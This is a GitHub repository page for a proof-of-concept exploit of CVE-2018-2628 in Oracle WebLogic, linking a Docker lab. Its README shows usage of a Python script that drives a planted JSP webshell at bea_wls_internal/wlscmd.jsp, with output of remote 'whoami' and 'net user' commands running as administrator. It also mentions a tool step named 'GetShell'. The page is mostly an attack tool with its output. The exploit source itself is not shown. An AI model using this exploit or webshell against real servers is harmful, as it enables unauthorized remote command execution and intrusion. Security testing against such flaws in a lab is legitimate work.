No description, website, or topics provided.
Switch branches/tags
Nothing to show
Clone or download
Latest commit c66dcf9 Oct 7, 2018
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
images update Jun 5, 2018
CVE-2018-2628-poc.py update Oct 7, 2018
README.md update Oct 7, 2018
cve-2018-2628-docker.jpg update Oct 7, 2018
cve-2018-2628-poc.jpg update Oct 7, 2018
cve-2018-2628.py update Jun 5, 2018
push.sh update Jun 5, 2018

README.md

CVE-2018-2628

python-poc

The Docker In Here! https://github.com/vulhub/vulhub/blob/master/weblogic/CVE-2018-2628/README.md

0x01 Nessus Scan

0x02 K8 Tools GetShell

0x03 CMD Query

Use-Method:
> python cve-2018-2628.py

set url :http://xx.xx.xx.xx:8001/bea_wls_internal/wlscmd.jsp
cmd >>: whoami

win-xxx8cb989qh\administrator

cmd >>: net user

\\WIN-XXX8CB989QH 的用户帐户

-------------------------------------------------------------------------------
Administrator            Guest
命令成功完成。

cmd >>: